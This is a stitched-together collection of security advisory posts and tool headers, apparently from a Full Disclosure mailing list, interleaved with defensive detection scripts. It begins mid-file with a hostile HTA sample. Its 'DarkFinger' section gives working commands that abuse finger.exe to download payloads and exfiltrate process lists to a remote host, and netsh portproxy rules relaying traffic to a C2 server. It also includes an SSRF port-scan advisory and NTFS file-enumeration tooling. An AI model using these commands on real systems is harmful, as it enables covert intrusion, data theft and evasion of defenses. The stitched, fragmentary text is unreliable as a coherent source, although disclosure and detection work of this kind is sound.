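var pop = win.open('c:/Users/[VICTIM]/Desktop/Sales_Report_2021.csv          .hta', 'pop', 'height=1,width=1')
pop.moveTo(2000,2000)
</script>

--=_NextPart_000--
"""

# Constructed benign archive: a real Content-Location and no script.
BENIGN_MHT = """\
MIME-Version: 1.0
Content-Type: multipart/related; type="text/html"; boundary="=_NextPart_001"

--=_NextPart_001
Content-Type: text/html; charset="UTF-8"
Content-Location: http://www.example.com/report.html

<html><body><p>Quarterly report</p></body></html>

--=_NextPart_001--
"""

if __name__ == "__main__":
    for name, doc in (("sample", SAMPLE_MHT), ("benign", BENIGN_MHT)):
        print(name, "->", triage_mht(doc) or ["no findings"])
```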
[FD] Windows NT Command-line Interpreter "cmd.exe" - Stack Buffer Overflow / PoC Video
https://www.youtube.com/watch?v=wYYgjV-PzD8
[FD] Windows NT Command-line Interpreter "cmd.exe" / Stack Buffer Overflow
[+] Credits: John Page (aka hyp3rlinx, malvuln)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CMD.EXE-STACK-BUFFER-OVERFLOW.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
cmd.exe is the default command-line interpreter for the OS/2, eComStation, ArcaOS, Microsoft Windows (Windows NT family and Windows CE family), and ReactOS operating systems.

[Vulnerability Type]
Stack Buffer Overflow

[CVE Reference]
N/A

[Security Issue]
A specially crafted payload will trigger a stack buffer overflow in the Windows NT "cmd.exe" command-line interpreter. Requires running an already dangerous file type like .cmd or .bat. However, when cmd.exe accepts arguments using the /c or /k flags, which execute commands specified by string, that will also trigger the buffer overflow condition.

E.g. cmd.exe /c .

[Memory Dump]
(660.12d4): Stack buffer overflow - code c409 (first/second chance not available)
ntdll!ZwWaitForMultipleObjects+0x14:
7ffb`00a809d4 c3 ret
0:000> .ecxr
rax=0022 rbx=02e34d796890 rcx=7ff7c0e492c0
rdx=7ff7c0e64534 rsi=200e rdi=200c
rip=7ff7c0e214f8 rsp=00f6a82ff0a0 rbp=00f6a82ff1d0
r8=200c r9=7ff7c0e60520 r10=
r11= r12=02e34d77a810 r13=0002
r14=02e34d796890 r15=200d
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=0202
cmd!StripQuotes+0xa8:
7ff7`c0e214f8 cc int 3
0:000> !analyze -v
***
* Exception Analysis *
***
Failed calling InternetOpenUrl, GLE=12029

FAULTING_IP:
cmd!StripQuotes+a8
7ff7`c0e214f8 cc int 3

EXCEPTION_RECORD: -- (.exr 0x)
ExceptionAddress: 7ff7c0e214f8 (cmd!StripQuotes+0x00a8)
ExceptionCode: c409 (Stack buffer overflow)
ExceptionFlags: 0001
NumberParameters: 1
Parameter[0]: 0008

PROCESS_NAME: cmd.exe

ERROR_CODE: (NTSTATUS) 0xc409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE: (NTSTATUS) 0xc409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_PARAMETER1: 0008

MOD_LIST:

NTGLOBALFLAG: 0

APPLICATION_VERIFIER_FLAGS: 0

FAULTING_THREAD: 12d4

BUGCHECK_STR: APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_SOFTWARE_NX_FAULT_EXPLOITABLE

PRIMARY_PROBLEM_CLASS: STACK_BUFFER_OVERRUN_EXPLOITABLE

DEFAULT_BUCKET_ID: STACK_BUFFER_OVERRUN_EXPLOITABLE

LAST_CONTROL_TRANSFER: from 7ffafcfca9c6 to 7ffb00a809d4

STACK_TEXT:
00f6`a82fea38 7ffa`fcfca9c6 : ` ` ` ` : ntdll!ZwWaitForMultipleObjects+0x14
00f6`a82fea40 7ffa`fcfca8ae : `0098 `0096 `d22d `d22d : KERNELBASE!WaitForMultipleObjectsEx+0x106
00f6`a82fed40 7ffa`fe1d190e : ` 00f6`a82ff1d0 7ff7`c0e3e000 7ffb`009f5a81 : KERNELBASE!WaitForMultipleObjects+0xe
00f6`a82fed80 7ffa`fe1d150f : ` ` `0003 `0001 : kernel32!WerpReportFaultInternal+0x3ce
00f6`a82feea0 7ffa`fd05976b : ` 00f6`a82ff1d0 `0004 ` : kernel32!WerpReportFault+0x73
00f6`a82feee0 7ff7`c0e26b6a : 7ff7`c0e3e000 7ff7`c0e3e000 `200e `200c : KERNELBASE!UnhandledExceptionFilter+0x35b
00f6`a82feff0 7ff7`c0e26df6 : 02e3` 7ff7`c0e1 02e3`4d796890 7ff7`c0e6602c : cmd!_raise_securityfailure+0x1a
00f6`a82ff020 7ff7`c0e214f8 : 02e3`4d77a810 ` `0002 `200e : cmd!_report_rangecheckfailure+0xf2
00f6`a82ff0a0 7ff7`c0e2096f : `200c 00f6`a82ff1d0 00f6`a82ff1d0 `200e : cmd!StripQuotes+0xa8
00f6`a82ff0d0 7ff7`c0e239a9 : 02e3`4d76ff90 02e3`4d76ff90 ` 02e3`4d76ff90 : cmd!SearchForExecutable+0x443
00f6`a82ff390 7ff7`c0e1fb9e : ` 02e3`4d76ff90 ` 02e3`4d99 : cmd!ECWork+0x69
00f6`a82ff600 7ff7`c0e1ff35 : 7ff7`c0e4fbb0 02e3`4d76ff90 0
[FD] Recon-Informer v1.3 - Intel for offensive systems anti-reconnaissance (nmap) tool
# -*- coding: utf-8 -*-
import logging,os,ctypes,sys,argparse,time,re
from subprocess import *
from datetime import datetime
from pkgutil import iter_modules
import pkg_resources

#ReconInformer v1.3 Copyright (c) MIT License
#By John Page (aka hyp3rlinx)
#ApparitionSec
#hyp3rlinx.altervista.org
#twitter.com/hyp3rlinx
#apparition...@gmail.com
#PoC Video URL: https://www.youtube.com/watch?v=XM-G9Udbphc
#==
#Feb 15, 2021
#v1.3 added: using -t flag we can process packets from a specific inbound IP address of interest.
#v1.3 added: timestamp for the detection results in console output window.
#v1.3 fix: utf-8 directive, for encoding error encountered in some older versions of Python.
#v1.3 fix: check for where window size is not relevant for UDP packets to prevent errors.
#v1.3 removed: script name in console window title to view CL arguments.
#v1.3 suppressed: output for fragmented packets that don't show any useful info.
#For best realtime console output call ReconInformer using python -u ReconInformer.py ...
#
#Recon Informer is a basic real-time anti-reconnaissance (nmap) detection tool for offensive
#security systems, useful for penetration testers. It runs on Windows/Linux and leverages scapy.
#
#Purpose:
#Recon-Informer is NOT meant for protecting public facing or lan critical enterprise systems whatsoever.
#Its purpose is to detect possible recon against our attacker system on a LAN to provide us defensive intel.
#Therefore, this script is most useful for basic short-term defensive visibility.
#
#Features:
#Attempt to detect and identify typical port scans generated using Nmap including scan type.
#-sS, -sC, -F, -sR, -sT, -sA, -sW, -sN, -sF, -sX, -sM, -sZ, -sY, -sO, -sV, -sP, -sn, -f (fragment scan), -D (Decoy).
#
#FYI, scans such as FIN don't work well on windows OS and firewalls can make scans return incorrect results.
#XMAS scans work against systems following RFC 793 for TCP/IP and don't work against any Windows versions,
#NULL is another type that doesn't work well on Windows.
#
#However, Fin, Null and Xmas scans can work on Linux machines. Therefore, Recon-Informer checks the OS
#it's run on and reports on scans that affect that OS, unless the -s "scan_type" flag is supplied.
#With the -s flag you can add extra scan types to detect that otherwise would be ignored.
#
#PING SWEEP (-sP, -sn, -sn -PY, -sY -PY) disabled by default.
#Not enabled by default as most Nmap scans begin with an ARP who-has request, when using -p flag you
#will see this detection preceding most scans. Also, you may see (noise) non-reconnaissance related ARP
#requests or even ones resulting from your own ICMP pings, this exclusive detection may fail if a scan uses -Pn flag.
#
#ICMP
#Note: If nmap --disable-arp-ping flag is supplied for the scan it will be detected as ICMP ping.
#
#BLOCK -b offending IP(s) default is no blocking as packets can be spoofed causing DoS.
#Firewall rule for blocks are in-bound "ANY" but still allows out-bound.
#FW rules are named like ReconInformer_.
#
#DELETE FW RULE -d to remove FW rules for blocked hosts.
#
#WHITELIST -w HOST-IP(s) you never want to block on.
#
#FILTER DEST PORTS -f (filter_dst_port) cut down noisy ports like TCP 2869, NetBIOs 137 etc.
#ignore packets destined for specific ports to try reduce false positive probe alerts.
#
#IGNORE HOST -n don't process packets from specific hosts, e.g. intranet-apps, printers and ACKS
#from SMB connected shares to try reduce false positives.
#
#LOG -l flag, default size limit for writing to disk is 1MB.
#
#UDP protocol is ignored by default to try reduce false positives from sources like NetBIOS, SNMP etc.
#To detect UDP scans use the -u flag, then can also combine with -f port filter
#(reduce noise) on specific dest ports like 137,161,1900,2869,7680.
#
#PCAP saving -s flag, default size limit is also 1MB.
#
#RESTORE CONSOLE -r focus the console window (Win OS) if console is minimized on port scan detect.
#
#Private Network range:
#Wrote this for basic LAN visibility for my attacker machine, packets from public IP ranges are ignored.
#
#BYPASS examples --scanflags and custom packet window sizes:
#Recon-Informer does not try to detect every case of --scanflags or specially crafted packets.
#
#These scans can bypass Recon-Informer and correctly report open ports found.
#nmap -n -Pn -sS --scanflags PSHSYN x.x.x.x -p139
#nmap -P0 -T4 -sS --scanflags=SYNPSH x.x.x.x
#
#Therefore, I accounted for some of these in Recon-Informer to report these detections.
#
#SCANFLAGS
#nmap -P0 -T4 -sS --scanflags=SYNURG x.x.x.x -p139 (returns correct)
#nmap -P0 -T4 -sS --scanflags=PSHSYNURG x.x.x.x -p21-445 (returns correct)
#nmap -P0 -T4 -sS --scanflags=ECE x.x.x.x shows up as NULL scan (nothing useful returned)
#nmap -n -Pn -sS --scanflags 0x42 x.x.x.x -p139 (useful)
#nmap -n -Pn -sS --scanflags=SYNPSH x.x.x.x -p135 (useful)
#
#The above scanflag examples, would have bypassed detec
[FD] NtFileSins v2.2 / Windows NTFS Privileged File Access Enumeration Tool (Python v3)
from subprocess import Popen, PIPE
import sys,argparse,re

#MIT License
#Copyright (c) 2020 John Page (aka hyp3rlinx)
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
#Permission is also explicitly given for insertion in vulnerability databases and similar,
#provided that due credit is given to the author John Page (aka hyp3rlinx).
#
#
# NtFileSins v2.2 (c)
# By John Page (aka hyp3rlinx)
# Python v3 compatible
# Enhancements: search target user dir on first pass, unless the -d flag is used, added .dat, .tmp file ext checks.
# TODO: Alternate Data Streams (ADS) check e.g. abc.txt:test.txt:$DATA
# Original advisory: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NTFS-PRIVILEGED-FILE-ACCESS-ENUMERATION.txt
#
# NtFileSins is a Windows File Enumeration Intel Gathering Tool.
# Standard users can prove existence of privileged user artifacts.
#
# Typically, the Windows commands DIR or TYPE hand out a default "Access Denied" error message,
# whether a file exists or doesn't exist, when restricted access is attempted by another user.
#
# However, by accessing files directly, attempting to "open" them from the cmd.exe shell,
# we can determine existence by comparing inconsistent Windows error messages.
#
# Requirements: 1) target users with >= privileges (not admin to admin).
#               2) artifacts must contain a dot "." or it returns false positives.
#
# Windows message "Access Denied" = Exists
# Windows message "The system cannot find the file" = Not exists
# Windows returns "no message" OR "c:\victim\artifact is not recognized as an internal or external command,
# operable program or batch file" = Admin to Admin so this script is not required.
#
# Profile other users by comparing NTFS error messages to potentially learn their activities or a machine's purpose.
# For evil, or maybe check for basic malware IOC existence on disk with user-only rights.
#From a defensive perspective we can leverage this to try to detect basic IOC and malware artifacts like .tmp, .ini, .dll, .exe
#or related config files on disk with user-only rights, instead of authenticating with admin rights, as a quick paranoid first pass.
#Example: if malware hides itself by unlinking itself from the EPROCESS list in memory or using programs like WinRAP to hide
#processes from Windows TaskMgr, we may not discover them even if using the tasklist command. The EPROCESS structure and flink/blink is
#how Windows TaskMgr shows all running processes. However, we may possibly detect them by testing for the correct IOC name if the
#malicious code happens to reside on disk and not only in memory. What's cool is we can do this without the need for admin rights.
#
#Other Windows commands that will also let us confirm file existence by comparing error messages are start, call, copy, icacls, and cd.
#However, the Windows commands rename, ren, cacls, type, dir, erase, move or del will issue flat out "Access is denied" messages.
#
#==#
# NtFileSins.py - Windows File Enumeration Intel Gathering Tool v2.2 (c)
#
# By John Page (aka hyp3rlinx)
#
# Apparition Security
#
#==#

BANNER='''
(ASCII art banner)
v2.2 (c) By hyp3rlinx ApparitionSec
'''

sin_cnt=0
internet_sin_cnt=0
found_set=set()
zone_set=set()
ARTIFACTS_SET=set()
ROOTDIR = "c:/Users/"
ZONE_IDENTIFIER=":Zone.Identifier:$DATA"
USER_DIRS=["
[FD] Recon Informer v1.2 - Intel for offensive systems tool.
import logging,os,ctypes,sys,argparse,time,re
from subprocess import *
from datetime import datetime
from pkgutil import iter_modules
import pkg_resources

#Recon Informer (c) v1.2
#By John Page (hyp3rlinx)
#ApparitionSec
#hyp3rlinx.altervista.org
#twitter.com/hyp3rlinx
#apparition...@gmail.com
#PoC Video URL: https://www.youtube.com/watch?v=XM-G9Udbphc
#==
#v1.2 fixed: window title bug, removed pygetwindow module.
#
#Recon Informer is a basic real-time anti-reconnaissance (nmap) detection tool for offensive
#security systems, useful for penetration testers. It runs on Windows/Linux and leverages scapy.
#
#Purpose:
#Recon-Informer is NOT meant for protecting public facing or LAN critical enterprise systems whatsoever.
#Its purpose is to detect possible recon against our attacker system on a LAN to provide us defensive intel.
#Therefore, this script is most useful for basic short-term defensive visibility.
#
#Features:
#Attempt to detect and identify typical port scans generated using Nmap including scan type.
#-sS, -sC, -F, -sR, -sT, -sA, -sW, -sN, -sF, -sX, -sM, -sZ, -sY, -sO, -sV, -sP, -sn, -f (fragment scan), -D (Decoy).
#
#FYI, scans such as FIN don't work well on Windows OS and firewalls can make scans return incorrect results.
#XMAS scans work against systems following RFC 793 for TCP/IP and don't work against any Windows versions,
#NULL is another type that doesn't work well on Windows.
#
#However, FIN, NULL and XMAS scans can work on Linux machines. Therefore, Recon-Informer checks the OS
#it's run on and reports on scans that affect that OS, unless the -s "scan_type" flag is supplied.
#With the -s flag you can add extra scan types to detect that otherwise would be ignored.
#
#PING SWEEP (-sP, -sn, -sn -PY, -sY -PY) disabled by default.
#Not enabled by default as most Nmap scans begin with an ARP who-has request; when using the -p flag you
#will see this detection preceding most scans. Also, you may see (noise) non-reconnaissance related ARP
#requests or even ones resulting from your own ICMP pings; this exclusive detection may fail if a scan uses the -Pn flag.
#
#ICMP
#Note: If the nmap --disable-arp-ping flag is supplied for the scan it will be detected as an ICMP ping.
#
#BLOCK -b offending IP(s), default is no blocking as packets can be spoofed causing DoS.
#Firewall rules for blocks are in-bound "ANY" but still allow out-bound.
#FW rules are named like ReconInformer_.
#
#DELETE FW RULE -d to remove FW rules for blocked hosts.
#
#WHITELIST -w HOST-IP(s) you never want to block on.
#
#FILTER DEST PORTS -f (filter_dst_port) cut down noisy ports like TCP 2869, NetBIOS 137 etc.
#Ignore packets destined for specific ports to try to reduce false positive probe alerts.
#
#IGNORE HOST -n don't process packets from specific hosts, e.g. intranet-apps, printers and ACKs
#from SMB connected shares to try to reduce false positives.
#
#LOG -l flag, default size limit for writing to disk is 1MB.
#
#UDP protocol is ignored by default to try to reduce false positives from sources like NetBIOS, SNMP etc.
#To detect UDP scans use the -u flag, which can also be combined with the -f port filter
#(reduce noise) on specific dest ports like 137,161,1900,2869,7680.
#
#PCAP saving -s flag, default size limit is also 1MB.
#
#RESTORE CONSOLE -r focus the console window (Win OS) if the console is minimized on port scan detect.
#
#Private Network range:
#Wrote this for basic LAN visibility for my attacker machine, packets from public IP ranges are ignored.
#
#BYPASS examples --scanflags and custom packet window sizes:
#Recon-Informer does not try to detect every case of --scanflags or specially crafted packets.
#
#These scans can bypass Recon-Informer and correctly report open ports found.
#nmap -n -Pn -sS --scanflags PSHSYN x.x.x.x -p139
#nmap -P0 -T4 -sS --scanflags=SYNPSH x.x.x.x
#
#Therefore, I accounted for some of these in Recon-Informer to report these detections.
#
#SCANFLAGS
#nmap -P0 -T4 -sS --scanflags=SYNURG x.x.x.x -p139 (returns correct)
#nmap -P0 -T4 -sS --scanflags=PSHSYNURG x.x.x.x -p21-445 (returns correct)
#nmap -P0 -T4 -sS --scanflags=ECE x.x.x.x shows up as NULL scan (nothing useful returned)
#nmap -n -Pn -sS --scanflags 0x42 x.x.x.x -p139 (useful)
#nmap -n -Pn -sS --scanflags=SYNPSH x.x.x.x -p135 (useful)
#
#The above scanflag examples would have bypassed detection if we didn't check packets for them.
#Useful scanflags that return open ports and bypassed Recon-Informer prior to scanflag checks:
#
#10  (0x00a) SYNPSH
#34  (0x022) SYNURG
#42  (0x02a) SYNPSHURG
#66  (0x042) SYNECN
#74  (0x04a) SYNPSHECN
#98  (0x062) SYNURGECN
#106 (0x06a) SYNPSHURGECN
#130 (0x082) SYNCWR
#138 (0x08a) SYNPSHCWR
#162 (0x0a2) SYNURGCWR
#170 (0x0aa) SYNPSHURGCWR
#194 (0x0c2) SYNECNCWR
#202 (0x0ca) SYNPSHECNCWR
#226 (0x0e2) SYNURGECNCWR
#234 (0x0ea) SYNPSHURGECNCWR
#
#Custom packet window size from 1024, typical of Nmap SYN scans, to a size of 666 for the bypass!
#ip=IP(dst="1
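The scanflags table above is worth checking mechanically: the following is an added example (not part of Recon Informer) that decodes a TCP flags byte, rebuilds the table's labels from the bit values, and classifies a probe the way a SYN-scan detector must if it is not to be bypassed by extra PSH/URG/ECN/CWR bits. The table's "ECN" label is kept for the 0x40 (ECE) bit so the output stays comparable with the header comments.

```python
import re

# Bit values of the TCP flags byte, low bit first (RFC 793; ECE/CWR from RFC 3168).
# The Recon Informer table labels the 0x40 (ECE) bit "ECN", so that name is used here.
TCP_FLAG_BITS = [
    ("FIN", 0x01), ("SYN", 0x02), ("RST", 0x04), ("PSH", 0x08),
    ("ACK", 0x10), ("URG", 0x20), ("ECN", 0x40), ("CWR", 0x80),
]

def decode_flags(value):
    """Return the set of flag names whose bits are set in a TCP flags byte."""
    return {name for name, bit in TCP_FLAG_BITS if value & bit}

def flag_label(value):
    """Concatenated label in the order the table above uses (SYN first)."""
    order = ["SYN", "PSH", "URG", "ECN", "CWR", "FIN", "RST", "ACK"]
    names = decode_flags(value)
    return "".join(n for n in order if n in names)

def classify_probe(value):
    """Classify an unsolicited inbound TCP segment by its flag combination.

    The point of the --scanflags bypasses listed above is that extra PSH/URG/
    ECN/CWR bits do not change what the target stack does with a SYN: SYN set
    with ACK clear is still a connection attempt, so a detector must score it
    like a plain SYN-scan probe rather than ignore an unfamiliar combination.
    """
    names = decode_flags(value)
    core = names - {"ECN", "CWR"}          # congestion bits never change scan semantics
    if "SYN" in names and "ACK" not in names:
        extras = names - {"SYN"}
        return "syn-scan-like (custom scanflags)" if extras else "syn-scan-like"
    if not core:                           # only ECN/CWR set, e.g. --scanflags=ECE
        return "null-scan"
    if core == {"FIN", "PSH", "URG"}:
        return "xmas-scan"
    if core == {"FIN"}:
        return "fin-scan"
    if core == {"FIN", "ACK"}:
        return "maimon-scan"
    return "other"

# The decimal value / label pairs from the header comments above.
SCANFLAG_TABLE = [
    (10, "SYNPSH"), (34, "SYNURG"), (42, "SYNPSHURG"), (66, "SYNECN"),
    (74, "SYNPSHECN"), (98, "SYNURGECN"), (106, "SYNPSHURGECN"), (130, "SYNCWR"),
    (138, "SYNPSHCWR"), (162, "SYNURGCWR"), (170, "SYNPSHURGCWR"), (194, "SYNECNCWR"),
    (202, "SYNPSHECNCWR"), (226, "SYNURGECNCWR"), (234, "SYNPSHURGECNCWR"),
]

def parse_scanflags(text):
    """Parse an Nmap-style --scanflags value: decimal, 0x hex, or flag names
    concatenated in any order (PSHSYN, SYNURG, ECE ...)."""
    text = text.strip()
    if re.fullmatch(r"0[xX][0-9a-fA-F]+", text):
        return int(text, 16)
    if text.isdigit():
        return int(text)
    bits = dict(TCP_FLAG_BITS)
    bits["ECE"] = bits["ECN"]              # accept Nmap's own spelling too
    value, rest = 0, text.upper()
    while rest:
        for name in bits:
            if rest.startswith(name):
                value |= bits[name]
                rest = rest[len(name):]
                break
        else:
            raise ValueError("unknown flag name in %r" % text)
    return value

def table_is_consistent():
    """True when every table label matches the flags decoded from its value."""
    return all(flag_label(v) == label for v, label in SCANFLAG_TABLE)

def main():
    for value, label in SCANFLAG_TABLE:
        print("%3d 0x%02x %-16s %s" % (value, value, label, classify_probe(value)))
    print("--scanflags=ECE ->", classify_probe(parse_scanflags("ECE")))

if __name__ == "__main__":
    main()
```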
[FD] Windows TCPIP Finger Command / C2 Channel and Bypassing Security Software
[+] Title: Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

The Microsoft Windows TCPIP Finger Command "finger.exe", which ships with the OS, can be used as a file downloader and makeshift C2 channel.
The legitimate use of the Windows Finger Command is to send Finger Protocol queries to remote Finger daemons to retrieve user information.
However, the finger client can also save the remote server response to disk using the command line redirection operator ">".

Intruders who compromise a computer may find it is locked down and "unknown" applications may be unable to download programs or tools.
By using built-in native Windows programs, it's possible they may be whitelisted by installed security programs and allowed to download files.

Red teams and such using LOL methods have made use of "Certutil.exe", a native Windows program, for downloading files.
However, Certutil.exe is recently blocked by Windows Defender Antivirus and logged as event "Trojan:Win32/Ceprolad.A" when it encounters http/https://.
Therefore, using Windows finger we can bypass current Windows Defender security restrictions to download tools, send commands and exfil data.

The Finger protocol as a C2 channel works by abusing the "user" token of the FINGER query protocol "user@host".
C2 commands masked as finger queries can download files and or exfil data without Windows Defender interference.

Download files:
C:\> finger @HOST > Malwr.txt

Exfil running processes:
C:\> for /f "tokens=1" %i in ('tasklist') do finger %i@192.168.1.21

Typically, the default port used by the FINGER protocol (Port 79) is blocked by organizations.
Privileged users can bypass this using Windows NetSh Portproxy. This can allow us to bypass Firewall restrictions to reach servers using unrestricted ports like 80/443.
Portproxy queries are then sent first to the local machine's IP address, which are then forwarded to the C2 server specified.

Port 43 (WHOIS) traffic.
netsh interface portproxy add v4tov4 listenaddress=[LOCAL-IP] listenport=79 connectaddress=[C2-Server] connectport=43
netsh interface portproxy add v4tov4 listenaddress=[LOCAL-IP] listenport=43 connectaddress=[LOCAL-IP] connectport=79

To display Portproxy use "C:\>netsh interface portproxy show all".

E.g. using Port 79
Ncat64.exe "nc@C2-Server" > tmp.txt

E.g. using Portproxy, send the query to local-ip first.
Ncat64.exe "nc@Local-IP" > tmp.txt

To leverage Windows finger.exe successfully as a file downloader and help evade network security devices, serve Base64 encoded text-files.
DarkFinger.py expects to receive the first two characters of the filename for the Finger Protocol Host token part for file downloads.
DarkFinger C2 expects exfil data to be prefixed with the dot "." character, so any arbitrary inbound queries are not confused for exfil.
This can be changed to whatever or even expanded upon to use XOR obfuscation methods etc... as this is just for a basic PoC.

[Event Logs / Forensics]
Certutil.exe file downloads are now blocked and logged by Windows Defender.
"Windows Defender Antivirus has taken action to protect this machine from malware or other potentially unwanted software.
Name: Trojan:Win32/Ceprolad.A
ID: 2147726914
Severity: Severe
Category: Trojan ... etc"

PowerShell, also used as an LOL method to download files, usually generates Windows event logs.
Finger initiated downloads write to disk and will leave forensic artifacts.
Finger TCP/IP traffic going out to Port 80/443 minus the HTTP protocol may stand out as well.
However, searching the Windows event logs for finger.exe entries, I found no trace of it generating Windows event logs anywhere.

DarkFinger.py C2 is very basic with no security. It's only to demonstrate using the Windows Finger Command as a C2 channel and show the possibilities.
Therefore, anyone can request to change the Port DarkFinger C2 listens on and or download files.

During my research, I found nothing on the internet publicly using or documenting Windows TCPIP Finger Command for use as a C2 channel.
Therefore, I release the "DarkFinger.py" C2 server and "DarkFinger-Agent.bat" which calls the Windows finger.exe in attacker friendly ways.

Tested successfully on Windows 10.

[DarkFinger-C2.py]
import socket,sys,re,time,os,argparse
from subprocess import *
from subprocess import Popen, PIPE, STDOUT

#DarkFinger / Windows Finger TCPIP Command C2 Server (c)
#Downloader and Covert Data Tunneler
#By John Page (aka hyp3rlinx)
#ApparitionSec
#twitter.com/hyp3rlinx
#
#File Downloads must be Base64 encoded text-files.
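Since the advisory notes that finger.exe itself leaves no event log trace, the two places a defender can still look are the portproxy table the relay trick needs and process command lines (assuming process-creation auditing is on). The following is an added example, not part of DarkFinger or the advisory: it parses constructed "netsh interface portproxy show all" output (column layout assumed from the netsh tool) for rules that touch port 79 and scores constructed command lines modelled on the ones quoted above.

```python
import re

# Constructed sample of "netsh interface portproxy show all" output; the first two rules
# mirror the two netsh commands quoted in the advisory, with 192.168.1.50 standing in
# for LOCAL-IP and 203.0.113.10 for the forwarded-to server. The third is benign filler.
PORTPROXY_SAMPLE = """\
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
192.168.1.50    79          203.0.113.10    43
192.168.1.50    43          192.168.1.50    79
192.168.1.50    8443        10.0.0.12       443
"""

# Constructed process command lines, as a process-creation audit record might carry them.
SAMPLE_CMDLINES = [
    'finger "nc@203.0.113.10" > tmp.txt',
    'for /f "tokens=1" %i in (\'tasklist\') do finger %i@192.168.1.21',
    'finger.exe alice@finger.example.org',
    'netsh interface portproxy add v4tov4 listenaddress=192.168.1.50 listenport=79 connectaddress=203.0.113.10 connectport=43',
    'certutil -hashfile C:\\Windows\\notepad.exe SHA256',
]

RULE_RE = re.compile(r"^(\S+)\s+(\d+)\s+(\S+)\s+(\d+)\s*$")
FINGER_PORT = 79

def parse_portproxy(output):
    """Return (listen_addr, listen_port, connect_addr, connect_port) for each rule row."""
    rules = []
    for line in output.splitlines():
        m = RULE_RE.match(line.strip())
        if m:
            rules.append((m.group(1), int(m.group(2)), m.group(3), int(m.group(4))))
    return rules

def suspicious_portproxy_rules(output):
    """Rules with the finger port on either side: the relay described above needs a local
    :79 listener forwarded to a remote port plus a return hop back to :79."""
    return [r for r in parse_portproxy(output) if FINGER_PORT in (r[1], r[3])]

def suspicious_finger_cmdline(cmdline):
    """Reasons a command line deserves a look, or [] when it looks like ordinary use."""
    c = cmdline.lower()
    reasons = []
    if re.search(r"(^|[\\\s\"'])finger(\.exe)?\s", c):
        if re.search(r"\s>>?\s*\S", c):
            reasons.append("finger output redirected to a file")
        if re.search(r"\bfor\s+/f\b", c) or "%i@" in c or "%%i@" in c:
            reasons.append("finger query built inside a for loop (data exfil pattern)")
    if "portproxy" in c and re.search(r"(listen|connect)port=79\b", c):
        reasons.append("portproxy rule touching finger port 79")
    return reasons

def main():
    for rule in suspicious_portproxy_rules(PORTPROXY_SAMPLE):
        print("portproxy:", rule)
    for cmd in SAMPLE_CMDLINES:
        print(suspicious_finger_cmdline(cmd) or "ok", "<-", cmd)

if __name__ == "__main__":
    main()
```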
[FD] CVE-2020-24548 / Ericom Access Server for (AccessNow & Ericom Blaze) v9.2.0 / Server Side Request Forgery
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/ERICOM-ACCESS-SERVER-ACCESS-NOW-BLAZE-9.2.0-SERVER-SIDE-REQUEST-FORGERY.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.ericom.com

[Product]
Ericom Access Server x64 for (AccessNow & Ericom Blaze) v9.2.0

AccessNow is an HTML5 remote desktop gateway that works from any device with an HTML5 compatible browser, including from Chromebooks and locked down devices.
Ericom Blaze provides remote desktop connectivity from Mac, Windows and Linux devices to applications on office / home PCs and virtual desktops (VDI).

[Vulnerability Type]
Server Side Request Forgery

[CVE Reference]
CVE-2020-24548

[Security Issue]
Ericom Access Server allows attackers to initiate SSRF requests, making outbound connections to arbitrary hosts and TCP ports.
Attackers who can reach the AccessNow server can target internal systems behind firewalls that are typically not accessible.
This can also be used to target third-party systems from the AccessNow server itself.

The AccessNow server will return an attacker friendly response, exfiltrating which ports are listening for connections.
This can bypass Firewall rules and undermine the integrity of other systems and security controls in place.

E.g. listen using Netcat, Nc64.exe -llvp 25

A) Ericom Server 192.168.88.152 (default port 8080)
B) Attacker 192.168.88.162
C) Victim 192.168.1.104

Using Wireshark we can observe:
A sends a SYN packet to C (port 25)
C sends SYN/ACK to A
A sends ACK to C.
A sends ACK/FIN to C port 25.

We will then get an AccessNow server response similar to below.

["C","M",["Cannot connect to '192.168.1.104:25'.",true]]

This message indicates we cannot connect and helpfully informs us of closed vs open ports.

[Affected Component]
Ericom Server port 8080 will forward connections to arbitrary Hosts and or Ports which are sent using Web-Socket requests.
The Ericom server then replies with a "Cannot connect to" message if a port is in a closed state.

[Attack Vectors]
Remote attackers can abuse the Ericom Access Server to conduct port scans on arbitrary systems.
This is possible due to a server side request forgery vulnerability and using a remote TCP socket program.

[Impact Information Disclosure]
true

[CVE Impact Other]
Exfiltration of open ports

[Exploit/POC]
import sys,ssl
